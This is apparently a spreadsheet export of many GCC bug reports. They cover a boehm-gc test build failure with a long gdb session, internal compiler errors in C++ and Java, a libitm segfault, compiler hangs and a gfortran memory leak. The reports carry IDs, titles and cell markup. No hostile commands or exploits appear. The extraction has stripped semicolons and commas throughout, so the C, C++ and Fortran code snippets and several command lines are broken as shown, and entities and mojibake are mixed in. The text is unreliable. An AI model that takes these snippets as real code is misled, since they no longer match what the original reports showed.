Configured with: /root/downloads/gcc-4_2-branch/configure --verbose --enable-languages=cadac++fortranjavaobjcobj-c++ --with-tune=athlon-xp --prefix=/usr --enable-objc-gc --enable-concept-checks --disable-multilib --with-gxx-include-dir=/usr/include/c++/4.2 --enable-libstdcxx-debug --enable-static --enable-shared --enable-initfini-array --enable-__cxa_atexit --enable-threads=posix --enable-version-specific-runtime-libs --enable-libssp --enable-libmudflap --enable-libgomp --disable-werror --enable-nls --with-included-gettext --enable-decimal-float --with-long-double-128 --enable-debug --enable-java-gc=boehm --with-x --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --enable-java-awt=gtkxlib --enable-gtk-cairo --enable-qt-peer --enable-xmlj --enable-gconf-peer --enable-tool-wrappers --with-gjdoc --enable-portable-native-sync --enable-libgcj-multifile --with-stabs --enable-hash-synchronization --enable-gc-debug --enable-interpreter --with-system-zlib --enable-libada --with-tls --with-cpu=athlon-xp --with-arch=athlon-xp --enable-stage1-checking=assertfoldgcmiscrtlrtlflagruntimetree
Thread model: posix
gcc version 4.2.1 20070515 (prerelease)
Three things.
1): When running make -i check the boehm tests don't make gctest correctly.
I had to build gctest by hand and it _seems_ to work. I am debugging a error that is the subject of a different bug report so I had to branch over to check if there was a problem with boehm-gc.
Here is the output of make -i check:
# /opt/gcc-4_2-build/./gcc/xgcc -B/opt/gcc-4_2-build/./gcc/ -B/usr/i686-pc-linux-gnu/bin/ -B/usr/i686-pc-linux-gnu/lib/ -isystem /usr/i686-pc-linux-gnu/include -isystem /usr/i686-pc-linux-gnu/sys-include -fexceptions -Iinclude -I././targ-include -I.//libc/include -I/root/downloads/gcc-4_2-branch/boehm-gc/include -O2 -g -O2 -o .libs/gctest -shared-libgcc /root/downloads/gcc-4_2-branch/boehm-gc/tests/test.c /root/downloads/gcc-4_2-branch/boehm-gc/pthread_support.c  ./.libs/libgcjgc.so -lpthread -ldl
/tmp/ccTiGNJU.o: In function `mktree':
/root/downloads/gcc-4_2-branch/boehm-gc/tests/test.c:798: undefined reference to `GC_local_malloc'
/root/downloads/gcc-4_2-branch/boehm-gc/tests/test.c:807: undefined reference to `GC_local_malloc_atomic'
/tmp/ccTiGNJU.o: In function `local_cons':
/root/downloads/gcc-4_2-branch/boehm-gc/tests/test.c:264: undefined reference to `GC_local_malloc'
/root/downloads/gcc-4_2-branch/boehm-gc/tests/test.c:267: undefined reference to `GC_local_gcj_malloc'
collect2: ld returned 1 exit status
#
Add -DGC_DEBUG and the compile error goes away (since that avoids the defines but doesn't fix the _actual_ problem). I'll build it static:
# /opt/gcc-4_2-build/./gcc/xgcc -DGC_DEBUG -B/opt/gcc-4_2-build/./gcc/ -B/usr/i686-pc-linux-gnu/bin/ -B/usr/i686-pc-linux-gnu/lib/ -isystem /usr/i686-pc-linux-gnu/include -isystem /usr/i686-pc-linux-gnu/sys-include -fexceptions -Iinclude -I././targ-include -I.//libc/include -I/root/downloads/gcc-4_2-branch/boehm-gc/include -O2 -g -O2 -o .libs/gctest -static /root/downloads/gcc-4_2-branch/boehm-gc/tests/test.c /root/downloads/gcc-4_2-branch/boehm-gc/pthread_support.c  ./.libs/libgcjgc.a -lpthread -ldl
# .libs/gctest
Completed 3 tests
Allocated 4863995 collectable objects
Allocated 303 uncollectable objects
Allocated 3750000 atomic objects
Allocated 34440 stubborn objects
Finalized 3302/3302 objects - finalization is probably ok
Total number of bytes allocated is 621142336
Final heap size is 20967424 bytes
Collector appears to work
Completed 195 collections
# 
Each time you run gctest the test passes but the numbers above are a little different - depending on available memory at a particular moment.
Which means it is non-deterministic (can interfere with debugging).
2): I don't know that boehm is integrated with GCC in accordance with the recommendations provided in the boehm DOCs.
The file: file:///root/downloads/gcc-4_2-branch/boehm-gc/doc/README.linux says:
To use threads you need to abide by the following requirements:
...
2) You must compile the collector with -DGC_LINUX_THREADS and -D_REENTRANT
   specified in the Makefile.
3a) Every file that makes thread calls should define GC_LINUX_THREADS and 
   _REENTRANT and then include gc.h.  Gc.h redefines some of the
   pthread primitives as macros which also provide the collector with
   information it requires.
3b) A new alternative to (3a) is to build the collector and compile GC clients
   with -DGC_USE_LD_WRAP and to link the final program with
   (for ld) --wrap read --wrap dlopen --wrap pthread_create \
	    --wrap pthread_join --wrap pthread_detach \
	    --wrap pthread_sigmask --wrap sleep
   (for gcc) -Wl--wrap -Wlread -Wl--wrap -Wldlopen -Wl--wrap \
	     -Wlpthread_create -Wl--wrap -Wlpthread_join -Wl--wrap \
	     -Wlpthread_detach -Wl--wrap -Wlpthread_sigmask \
	     -Wl--wrap -Wlsleep
   In any case _REENTRANT should be defined during compilation.
4) Dlopen() disables collection during its execution.  (It can't run
   concurrently with the collector since the collector looks at its
   data structures.  It can't acquire the allocator lock since arbitrary
   user startup code may run as part of dlopen().)  Under unusual
   conditions this may cause unexpected heap growth.
5) The combination of GC_LINUX_THREADS REDIRECT_MALLOC and incremental
   collection fails in seemingly random places.  This hasn't been tracked
   down yet but is perhaps not completely astonishing.  The thread package
   uses malloc and thus can presumably get SIGSEGVs while inside the
   package.  There is no real guarantee that signals are handled properly
   at that point.
Checking for the word _REENTRANT in the logging of my make I find:
# grep _REENTRANT /opt/gcc-4_2-build/made_3_profiled_log.txt
/opt/gcc-4_2-build/made_3_profiled_log.txt:checking whether gethostbyname_r declaration requires -D_REENTRANT... fail
That word comes from the configuration of i686-pc-linux-gnu/libjava and is not relevant:
checking for gethostbyname_r... yes
checking whether gethostbyname_r declaration requires -D_REENTRANT... fail
checking for struct hostent_data... no
Checking for the word pthread_sigmask in the logging of my make I find nothing:
# grep pthread_sigmask /opt/gcc-4_2-build/made_3_profiled_log.txt
# 
Even if we were following rules 2 3a or 3b and 4 we may get hit by rule 5
collection fails in seemingly random places. I observed such difficulties
trying to use gdb. It did not _seem_ that boehm-gc failed but GC did make
it tough to debug because what I was looking for was memory related and thus
I had a moving target affecting how many times what I was tracing could be
executed (EG: sometimes c 30 would skip the correct number of breakpoint
and then step would be at the bug - and sometimes that did not work).
Every time I run gctest the it says it passes but the values do not match.
It runs a different number of collections (based on available memory at the 
moment it is ran). It says finalization is probably ok and Collector 
appears to work which is not saying it is certain.
3): Numer 2 makes fixing this one harder. While working on the bug mentioned at the top of this report I got this error:
Base64.java:200: warning: Unreachable statement.
    for (i = off i &lt; off + len i++)
                                       ^
1 warning
Base64.java: At top level:
Base64.java:50: internal compiler error: in uses_jv_markobj_p at java/boehm.c:245
Please submit a full bug report ...
I started gdb like this:
# gdb --args /opt/gcc-4_2-build/gcc/xgcc -v -B/opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/ -B/opt/gcc-4_2-build/gcc/ -ffloat-store -fomit-frame-pointer -fclasspath= -fbootclasspath=/opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -g -O2 -c -MT gnu/java/security/util.lo -MD -MP -MF Base64.deps Base64.java -fPIC -o Base64.o
Here is how the error is debugged:
(gdb) start
Breakpoint 1 at 0x8053f04: file /root/downloads/gcc-4_2-branch/gcc/gcc.c line 6090.
Starting program: /opt/gcc-4_2-build/gcc/xgcc -v -B/opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/ -B/opt/gcc-4_2-build/gcc/ -ffloat-store -fomit-frame-pointer -fclasspath= -fbootclasspath=/opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -g -O2 -c -MT gnu/java/security/util.lo -MD -MP -MF Base64.deps Base64.java -fPIC -o Base64.o
main (argc=-1078606192 argv=0xb7e17e6d) at /root/downloads/gcc-4_2-branch/gcc/gcc.c:6090
6090      p = argv[0] + strlen (argv[0])
(gdb) where
#0  main (argc=-1078606192 argv=0xb7e17e6d) at /root/downloads/gcc-4_2-branch/gcc/gcc.c:6090
(gdb) l 5800
5795            goto invalid
5796          p++
5797        }
5798
5799      end_body = p
5800      while (end_body[-1] == ' ' || end_body[-1] == '\t')
5801        end_body--
5802
5803      if (have_subst &amp;&amp; !starred)
5804        goto invalid
(gdb) l 4635
4630
4631            set_collect_gcc_options ()
4632
4633            if (argbuf_index &gt; 0)
4634              {
4635                value = execute ()
4636                if (value)
4637                  return value
4638              }
4639            /* Reinitialize for a new command and for a new argument.  */
(gdb) (gdb) info breakp
Num Type           Disp Enb Address    What
38  breakpoint     keep y   0x080533dd in handle_braces at /root/downloads/gcc-4_2-branch/gcc/gcc.c:5800
        breakpoint already hit 37 times
(gdb) b 4635
(gdb) c
Continuing.
Breakpoint 39 do_spec_1 (spec=0x807e018 -o %|.s |\n as %(asm_options) %|.s %A inswitch=0 soft_matched_part=0x0)
    at /root/downloads/gcc-4_2-branch/gcc/gcc.c:4635
4635                value = execute ()
(gdb) where
#0  do_spec_1 (spec=0x807e018 -o %|.s |\n as %(asm_options) %|.s %A inswitch=0 soft_matched_part=0x0)
    at /root/downloads/gcc-4_2-branch/gcc/gcc.c:4635
#1  0x080534b7 in handle_braces (p=0x8082585 -o %|.s |\n as %(asm_options) %|.s %A })
    at /root/downloads/gcc-4_2-branch/gcc/gcc.c:5814
#2  0x08050c19 in do_spec_1 (spec=0x8082580 %{!S:-o %|.s |\n as %(asm_options) %|.s %A } inswitch=0 
    soft_matched_part=0x0) at /root/downloads/gcc-4_2-branch/gcc/gcc.c:5204
#3  0x08050d9b in do_spec_1 (spec=0x8086048 %(invoke_as) inswitch=0 soft_matched_part=0x0)
    at /root/downloads/gcc-4_2-branch/gcc/gcc.c:5303
#4  0x080534b7 in handle_braces (p=0x8085fa9 %(invoke_as)}) at /root/downloads/gcc-4_2-branch/gcc/gcc.c:5814
#5  0x08050c19 in do_spec_1 (
    spec=0x8085f20 jc1 %i %(jc1) %(cc1_options) %{+e*} %{I*} ' '  %{MD:-MD_} %{MMD:-MMD_} %{M} %{MM} %{MA} %{MT*} %{MF*} ' '  %{!fsyntax-only:%(invoke_as)} inswitch=0 soft_matched_part=0x0)
    at /root/downloads/gcc-4_2-branch/gcc/gcc.c:5204
#6  0x080534b7 in handle_braces (
    p=0x8069046 jc1 %i %(jc1) %(cc1_options) %{+e*} %{I*} ' '  %{MD:-MD_} %{MMD:-MMD_} %{M} %{MM} %{MA} %{MT*} %{MF*} ' '  %{!fsyntax-only:%(invoke_as)}})
    at /root/downloads/gcc-4_2-branch/gcc/gcc.c:5814
#7  0x08050c19 in do_spec_1 (
    spec=0x8068ee0 %{fjni:%{femit-class-files:%e-fjni and -femit-class-files are incompatible}}    %{fjni:%{femit-class-file:%e-fjni and -femit-class-file are incompatible}}    %{femit-class-file:%{!fsyntax-only:%e-femi... inswitch=0 
    soft_matched_part=0x0) at /root/downloads/gcc-4_2-branch/gcc/gcc.c:5204
#8  0x08053a3d in do_spec_2 (
    spec=0x8068ee0 %{fjni:%{femit-class-files:%e-fjni and -femit-class-files are incompatible}}    %{fjni:%{femit-class-file:%e-fjni and -femit-class-file are incompatible}}    %{femit-class-file:%{!fsyntax-only:%e-femi...)
    at /root/downloads/gcc-4_2-branch/gcc/gcc.c:4420
#9  0x08053e6c in do_spec (
    spec=0x8068ee0 %{fjni:%{femit-class-files:%e-fjni and -femit-class-files are incompatible}}    %{fjni:%{femit-class-file:%e-fjni and -femit-class-file are incompatible}}    %{femit-class-file:%{!fsyntax-only:%e-femi...)
    at /root/downloads/gcc-4_2-branch/gcc/gcc.c:4388
#10 0x08054ae1 in main (argc=Cannot access memory at address 0x0
) at /root/downloads/gcc-4_2-branch/gcc/gcc.c:6628
(gdb) step
execute () at /root/downloads/gcc-4_2-branch/gcc/gcc.c:2797
2797      gcc_assert (!processing_spec_function)
1): I think that is clear. Load the Base64.o Java file and start the debugger.
2): List two parts of the code to show that your line numbers are the same as
    mine. I did not alter the source but you might want to try on a different
    version of gcc.
3): Place the two breakpoints on those same lines.
4): Run the program and hit the breakpoint.
5): On _that_ particular run of _GDB_ the memory was in a state where I
    _usually_ (but sometimes not) had to use c 36 to jump the breakpoint.
    Because boehm-gc is changing things (along with the OS) sometimes I need
    to use a different number after the c. Once I found out the number I
    could use r to restart gdb and then use c # to jump the breakpoints.
6): AFTER figuring out the number for c for a _particular_ run of gdb I could
    easily get to the point where I simply add one more breakpoint and type
    c (without a following number) to land exactly on the instruction that
    caused the ICE when I typed n at the gdb prompt.
Those problems with boehm-gc (the boehm-gc DOCs admit to random occurances of trouble) make debugging tough _AND_ might have been the cause of some of the languages and libraries make -i check tests failing.
We did not seem to follow all the DOCs when integrating boehm with gcc - I will check more carefully. _EVEN_ _IF_ we did the DOCs says that random failures occur that have not been tracked down.
The gctest is not getting built when ./configure uses the above options.</t>
  </si>
  <si>
    <t>GCC-26680</t>
  </si>
  <si>
    <t>internal segfault with operator ( ) on non-integer argument</t>
  </si>
  <si>
    <t>$ g++ -v
Using built-in specs.
Target: i386-unknown-netbsdelf3.0.
/.../
Thread model: posix
gcc version 4.0.2
$cat main.cc
struct Coord {}
template  class Array {}
class Env
class           Obstacle
{
  Obstacle(const struct Coord&amp; pos Env* env)
  {
    (*env)(pos)-&gt;obstacle_set(this)
  }
}
$ g++ main.cc
main.cc: In constructor 'Obstacle::Obstacle(Env*)':
main.cc:4: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>mickael.labau</t>
  </si>
  <si>
    <t>GCC-48625</t>
  </si>
  <si>
    <t>[trans-mem] Segfault in libitm when compiling with -O2</t>
  </si>
  <si>
    <t>Created attachment 23998
Reduced Kmeans benchmarks from the STAMP suite that segfaults in libitm
The kmeans benchmark from the STAMP TM suite segfaults at run time when compiled with -O2. 
I attached a reduced version of the kmeans program (one file containing all functions plus header and input files - it is still quite large). 
Compiling the file works fine:
martin:~/GCC_STAMP/stamp-0.9.10/kmeans_red$ ~/GCC_TM_BRANCH/gcc_install/bin/gcc-tm -I../include -I~/GCC_TM_BRANCH/transactional-memory/libitm -g -O2 -Wall -fgnu-tm -o kmeans_all kmeans_all.c -lpthread -litm -lm
kmeans_all.c: In function 'main':
kmeans_all.c:162:13: warning: variable 'len' set but not used
At run time it crashes with a segfault in the libitm. The crash is related to the barrier optimization (using ReadforWrite barriers). When compiled with -O1 instead of -O2 the program runs fine. 
Please see the gdb's backtrace of the segfault:
martin:~/GCC_STAMP/stamp-0.9.10/kmeans_red$ gdb --args ./kmeans_all -m15 -n15 -i inputs/random-n2048-d16-c16.txt -p 4
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as x86_64-linux-gnu.
For bug reporting instructions please see:
...
Reading symbols from ~/GCC_STAMP/stamp-0.9.10/kmeans_red/kmeans_all...done.
(gdb) run
Starting program: ~/GCC_STAMP/stamp-0.9.10/kmeans_red/kmeans_all -m15 -n15 -i inputs/random-n2048-d16-c16.txt -p 4
[Thread debugging using libthread_db enabled]
[New Thread 0x7ffff698a700 (LWP 27681)]
[New Thread 0x7ffff6189700 (LWP 27682)]
[New Thread 0x7ffff5988700 (LWP 27683)]
Program received signal SIGSEGV Segmentation fault.
do_write_lock (this=0x64f730 addr=) at ../../../transactional-memory/libitm/method-wbetl.cc:265
265       *line = *addr
(gdb) backtrace
#0  do_write_lock (this=0x64f730 addr=) at ../../../transactional-memory/libitm/method-wbetl.cc:265
#1  0x00007ffff71b64a9 in do_read (ptr=0x81 lock=GTM::gtm_dispatch::RfW) at ../../../transactional-memory/libitm/barrier.tpl:47
#2  0x0000000000401e0f in work (argPtr=) at kmeans_all.c:559
#3  0x0000000000401c75 in threadWait (argPtr=) at kmeans_all.c:948
#4  0x0000000000401cd5 in thread_start (funcPtr= argPtr=) at kmeans_all.c:1020
#5  0x0000000000402443 in normal_exec (nthreads=4 feature=0x625260 nfeatures=16 npoints=2048 nclusters=15 threshold=0.00100000005 membership= 
    randomPtr=0x64d770) at kmeans_all.c:684
#6  0x00000000004026a1 in cluster_exec (nthreads=4 numObjects=2048 numAttributes=16 attributes=0x625260 use_zscore_transform= min_nclusters=15 
    max_nclusters=15 threshold=0.00100000005 best_nclusters=0x7fffffffddec cluster_centres=0x7fffffffddd8 cluster_assign=0x649750) at kmeans_all.c:1404
#7  0x0000000000402c5e in main (argc=6312528 argv=) at kmeans_all.c:299
Any help is appreciated :-)</t>
  </si>
  <si>
    <t>GCC-48802</t>
  </si>
  <si>
    <t>ICE with inheritance and nothrow virtual destructors</t>
  </si>
  <si>
    <t>namespace std {
	struct range_error  {
		virtual ~range_error() throw()
	}
	struct Uncertain_conversion_exception : std::range_error {
		~Uncertain_conversion_exception() throw() {
		}
	}
}
$ c++ bug.cc -fsyntax-only        
bug.cc:7:3: internal compiler error: Segmentation fault
(I noticed it with C++0x but it seems to apply to C++03 as well)</t>
  </si>
  <si>
    <t>GCC-34815</t>
  </si>
  <si>
    <t>[4.1 4.2] endless loop while trying to compile 2.6.23-rc4</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/440287]
seen with current 4.1 and 4.2 branches not seen on the trunk.
  Matthias
While trying to compile the 2.6.23-rc4 snapshots from buildserver.net on hppa gcc went in some kind of endless loop over the following command
hppa64-linux-gnu-gcc-4.1 -Wp-MDfs/ocfs2/.alloc.o.d  -nostdinc -isystem /usr/lib/gcc/hppa64-linux-gnu/4.1.3/include -D__KERNEL__ -Iinclude  -include 
include/linux/autoconf.h -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration 
-fno-cse-follow-jumps -Os -pipe -mno-space-regs -mfast-indirect-calls -mdisable-fpregs -ffunction-sections -march=2.0 -mschedule=8000 
-fomit-frame-pointer  -fno-stack-protector -Wdeclaration-after-statement -Wno-pointer-sign  -Ifs/ocfs2 -DCATCH_BH_JBD_RACES  -DMODULE 
-DKBUILD_STR(s)=#s -DKBUILD_BASENAME=KBUILD_STR(alloc)  -DKBUILD_MODNAME=KBUILD_STR(ocfs2) -c -o fs/ocfs2/.tmp_alloc.o fs/ocfs2/alloc.c
this is for the parisc64-smp flavour all other flavours seem to build fine. I had no time yet to investigate the differences.
Building with -O0 seems to work -O1/-O2/-Os all show the bug.</t>
  </si>
  <si>
    <t>GCC-15993</t>
  </si>
  <si>
    <t>[4.0 Regression] [lno] Compiler hangs at -O3</t>
  </si>
  <si>
    <t>The following (derived from the gnu go program) hangs at compile time in
lno-branch with -O3.  Partial analysis follows.
extern unsigned char baz[421]
int 
foo(int i1 int i2 int j1 int j2)
{
  int x y
  if (i1 &gt; i2)
    return foo(i2 i1 j1 j2)
  if (j1 &gt; j2)
    return foo(i1 i2 j2 j1)
  for (x = i1 x &lt;= i2 x++)
    for (y = j1 y &lt;= j2 y++)
      if (baz[21 + x*20 + y] != 0)
        return 0
  return 1
}
1) the tree inliner does exactly the right thing eliminating all recursion and making 4 copies of the 
bottom loop exactly one of which gets executed.
2) well maybe not quite the right thing because there's a 5th loop in the trees at the top with 4
exits one that leads to each of the 4 copeis of the loop.  None of the paths that lead to the
bottom of the 5th loop can actually get executed because for example i1j1 would
both have to be true.  Something like this happens on each possible path to the loopback.
This is peculiar but I don't think the trees are wrong at this point i.e. they're a semantically
equivalent representation of the input program.
3) the loop code figures out correctly that all the tests inside the top loop are invariant and
pulls them out.  This leaves the top loop with no exit but it cannot be reached so while
this is even more peculiar I don't think the trees are wrong here either.
4) the (3rd pass of) the dominator opts go into a loop dealing with this cfg.  It changes the cfg on
each pass but then deletes what it inserted (it also adds some additional copying around of i1
and j1 on each pass which doesn't get deleted at least not yet). The steady state is reached the 2nd 
time through.  I suspect this is where the problem is thus it's in mainline but I don't know how to 
tickle the bug there it depends on the loop optimizer producing this cfg.
If somebody can say for sure which phase is wrong and why I can look further.</t>
  </si>
  <si>
    <t>GCC-4981</t>
  </si>
  <si>
    <t>g++ 2.95.3 unterminated macro calls and strings causes crash</t>
  </si>
  <si>
    <t>tried compiling enclosed code with:
$ g++ -o unarchive unarchive.cpp
receive following message:
unarchive.cpp:45: unterminated macro call
unarchive.cpp:65: unterminated string or character
constant
unarchive.cpp:1: possible real start of unterminated constant
cpp0: Internal compiler error in `rescan' at ../../gcc/cccp.c:3149
Please submit a full bug report.
See  for instructions.
tried making .i* files but they were zero bytes
so i have to enclose source.
Release:
unknown
Environment:
2xi686 box running SuSe Linux 7.2 (kernel = 2.4.7)
How-To-Repeat:
open the archive compile it with
g++ -o unarchive unarchive.cpp</t>
  </si>
  <si>
    <t>alexs</t>
  </si>
  <si>
    <t>GCC-52694</t>
  </si>
  <si>
    <t>[4.8 regression] bootstrap failure: libjava/java/io/natVMConsole.cc:35:20: error: 'IUCL C' was not declared in this scope</t>
  </si>
  <si>
    <t>I am seeing this on amd64-unknown-freebsd8.3:
scratch/tmp/gerald/gcc-HEAD/libjava/java/io/natVMConsole.cc: In static member function 'static java::lang::String* java::io::VMConsole::readPassword(java::io::
Console*)':
/scratch/tmp/gerald/gcc-HEAD/libjava/java/io/natVMConsole.cc:35:20: error: 'IUCL
C' was not declared in this scope
gmake[3]: *** [java/io/natVMConsole.lo] Error 1
Looks like this is caused by
  2012-03-16  Andrew John Hughes  
        * Makefile.am: Add natVMConsole.cc.
        * Makefile.in: Regenerated.
        * gcj/Makefile.in: Likewise.
        * gcj/javaprims.h: Classes updated.
        * gnu/javax/crypto/key/dh/GnuDHKeyPairGenerator.h
        * gnu/javax/net/ssl/provider/CipherSuite.h
        * gnu/javax/net/ssl/provider/OutputSecurityParameters.h
        * include/Makefile.in:
        Regenerated.
        * java/io/Console.h
        * java/io/IOError.h
        * java/io/ObjectOutputStream$2.h:
        Initial generation.
        * java/io/ObjectOutputStream.h: Regenerated.
        * java/io/VMConsole.h: Initial generation.
        * java/io/VMConsole.java: Copied from classpath/vm/reference.
        * java/io/natVMConsole.cc: Implemented readPassword.
        * java/nio/channels/spi/SelectorProvider$1.h
        * java/security/KeyStore$1.h:
        Initial generation.
        * java/security/ProtectionDomain.h
        * java/text/DateFormatSymbols.h
        * java/util/HashMap.h
        * java/util/regex/Matcher.h
        * java/util/regex/Pattern.h:
        Regenerated.
        * javax/xml/stream/util/ReaderDelegate.h:
        Removed.
        * sources.am
        * testsuite/Makefile.in:
        Regenerated.</t>
  </si>
  <si>
    <t>GCC-16504</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in gmon-sol2 stage2</t>
  </si>
  <si>
    <t>This morning's CVS.
mushroom~...gcc&gt;uname -a
SunOS mushroom 5.7 Generic_106541-19 sun4u sparc SUNWUltra-2
mushroom~...gcc&gt;gcc -v
Reading specs from /mnt/home3/utilities/lib/gcc/sparc-sun-solaris2.7/3.5.0/specs
Configured with: /mnt/home3/utilities/gcc/configure
--prefix=/mnt/home3/utilities --verbose --with-as=/mnt/home3/utilities/bin/as
--with-ld=/mnt/home3/utilities/bin/ld --with-gnu-as --with-gnu-ld
--disable-multilib --enable-languages=c++
Thread model: posix
gcc version 3.5.0 20040621 (experimental)
mushroom~...gcc&gt;alias CONFIGURECVS
setenv CC gcc  /mnt/home3/utilities/gcc/configure --prefix=/mnt/home3/utilities
--verbose --with-as=/mnt/home3/utilities/bin/as
--with-ld=/mnt/home3/utilities/bin/ld --with-gnu-as --with-gnu-ld
--disable-multilib --enable-languages=c++ |&amp; tee clog
mushroom~...gcc&gt; alias BUILD
nice gmake CFLAGS='-O' BOOT_CFLAGS='-O' LIBCFLAGS='-g -O' CXXFLAGS='-O'
LIBCXXFLAGS='-g -O' bootstrap |&amp; tee log
./xgcc -B./ -B/mnt/home3/utilities/sparc-sun-solaris2.7/bin/ -isystem
/mnt/home3/utilities/sparc-sun-solaris2.7/include -isystem
/mnt/home3/utilities/sparc-sun-solaris2.7/sys-include
-L/export/home/mckelvey/utilities/gcc-obj/gcc/../ld -DIN_GCC    -W -Wall
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition
 -isystem ./include  -I. -I. -I/mnt/home3/utilities/gcc/gcc
-I/mnt/home3/utilities/gcc/gcc/. -I/mnt/home3/utilities/gcc/gcc/../include
-I/mnt/home3/utilities/gcc/gcc/../libcpp/include
-I/mnt/home3/utilities/gcc/gcc/../libbanshee/libcompat
-I/mnt/home3/utilities/gcc/gcc/../libbanshee
-I/mnt/home3/utilities/gcc/gcc/../libbanshee/points-to   \
	-c /mnt/home3/utilities/gcc/gcc/config/sparc/gmon-sol2.c -o gmon.o
/mnt/home3/utilities/gcc/gcc/config/sparc/gmon-sol2.c: In function `monstartup':
/mnt/home3/utilities/gcc/gcc/config/sparc/gmon-sol2.c:168: internal compiler
error: Bus Error
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-54726</t>
  </si>
  <si>
    <t>[4.8 Regression] libbacktrace segfaults on gcc_asserts with stripped gcc</t>
  </si>
  <si>
    <t>On gcc installed with make install-strip libbacktrace outputs
bogus internal compiler error: Segmentation fault on normal 
gcc_asserts.
For example the testcase from Bug 54694 now prints:
markus@x4 tmp % gcc -w -Wfatal-errors -mavx -m32 -c -O2 test.i
test.i: In function â€˜helper_fldl_ST0â€™:
test.i:20:1: internal compiler error: in dwarf2out_frame_debug_expr at dwarf2cfi.c:1532
 }
 ^
test.i:20:1: internal compiler error: Segmentation fault
gcc: internal compiler error: Segmentation fault (program cc1)
[1]    6684 segmentation fault  gcc -w -Wfatal-errors -mavx -m32 -c -O2 test.i
and this also gets logged in syslog (from dmesg):
cc1[6685]: segfault at 0 ip           (null) sp 00007fffe5fa8828 error 14 in cc1[400000+a78000]
gcc[6684]: segfault at 0 ip           (null) sp 00007fff672976b8 error 14 in gcc[400000+97000]</t>
  </si>
  <si>
    <t>GCC-64386</t>
  </si>
  <si>
    <t>ICE: in extract_insn at recog.c:2327 (unrecognizable insn) with -mavx512bw</t>
  </si>
  <si>
    <t>Created attachment 34321
reduced testcase (from gcc.dg/vect/vect-cond-7.c)
Compiler output:
$ gcc -O -ftree-vectorize -mavx512bw testcase.c 
testcase.c: In function 'fc':
testcase.c:11:1: error: unrecognizable insn:
 }
 ^
(insn 13 12 14 2 (set (reg:DI 98)
        (eq:DI (reg:V64QI 88 [ vect__6.8 ])
            (reg:V64QI 97))) testcase.c:9 -1
     (nil))
testcase.c:11:1: internal compiler error: in extract_insn at recog.c:2327
0xbd9d78 _fatal_insn(char const* rtx_def const* char const* int char const*)
        /mnt/svn/gcc-trunk/gcc/rtl-error.c:110
0xbd9e08 _fatal_insn_not_found(rtx_def const* char const* int char const*)
        /mnt/svn/gcc-trunk/gcc/rtl-error.c:118
0xb903b8 extract_insn(rtx_insn*)
        /mnt/svn/gcc-trunk/gcc/recog.c:2327
0x96eecd instantiate_virtual_regs_in_insn
        /mnt/svn/gcc-trunk/gcc/function.c:1582
0x96eecd instantiate_virtual_regs
        /mnt/svn/gcc-trunk/gcc/function.c:1950
0x96eecd execute
        /mnt/svn/gcc-trunk/gcc/function.c:1999
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r219043 - ICE</t>
  </si>
  <si>
    <t>GCC-41871</t>
  </si>
  <si>
    <t>lto-plugin gives: could not open/create temporary file</t>
  </si>
  <si>
    <t xml:space="preserve">This might be a limit-on-number-of-open-files issue.
I encounter it while trying to link with link time optimization *and* using the linker plugin an executable which needs loads of object files from two dozen libraries.
To study this use a program that's build from libraries and linked as follows:
gcc [optimization options] -flto -fwhole-program -fuse-linker-plugin -o exe mainprogram.c lib1.a lib2.a ... libn.a
To enforce the limit use the following command in bash
ulimit -n </t>
  </si>
  <si>
    <t>GCC-55469</t>
  </si>
  <si>
    <t>memory leak on read with istat.ne.0</t>
  </si>
  <si>
    <t>The following testcase leads to memory leaks with gfortran 4.5/4.6/4.7/4.8 (as found by valgrind) 4.1 seems not to leak (but has a couple of warnings).
REAL :: z
INTEGER :: istat
CHARACTER(LEN=3) :: t
t=NVE
READ (UNIT=tFMT=*IOSTAT=istat) z
END
note that istat.NE.0 in this case.
==37422== 300 bytes in 1 blocks are definitely lost in loss record 1 of 1
==37422==    at 0x4A057F4: calloc (vg_replace_malloc.c:593)
==37422==    by 0x4C298FF: _gfortrani_xcalloc (memory.c:56)
==37422==    by 0x4CE2A82: l_push_char.isra.2 (list_read.c:641)
==37422==    by 0x4CE3223: read_real (list_read.c:1634)
==37422==    by 0x4CE504E: _gfortrani_list_formatted_read (list_read.c:1895)</t>
  </si>
  <si>
    <t>GCC-20101</t>
  </si>
  <si>
    <t>zero prints incorrectly with 1pe12.4</t>
  </si>
  <si>
    <t>I have never seen zero printed with a negative exponent before -
[dir:~/tests/gfortran] dir% gfortran -o format format.f
[dir:~/tests/gfortran] dir% format
  0.0000E-01
[dir:~/tests/gfortran] dir% cat format.f
      program main
      zero=0
      write(61000)zero
 1000 format(1pe12.4)
      end
[</t>
  </si>
  <si>
    <t>GCC-26103</t>
  </si>
  <si>
    <t>Wrong exception thrown</t>
  </si>
  <si>
    <t>When running the attached testcase gcj 4.1 throws a StringIndexOutOfBoundsException instead of ClassNotFoundException. GNU classpath 0.20 is not affected as jamvm 1.4.2 and cacao 0.94 and kaffe 1.1.7rc1 throw the correct exception.</t>
  </si>
  <si>
    <t>GCC-36406</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 regression] ICE with template delete operator</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 3.0:
====================================================
struct A
{
  A()
  void* operator new(__SIZE_TYPE__ int = 0)
  template void operator delete(void* int)
}
A* p = new A
====================================================
gimplification failed:
&gt;&gt;
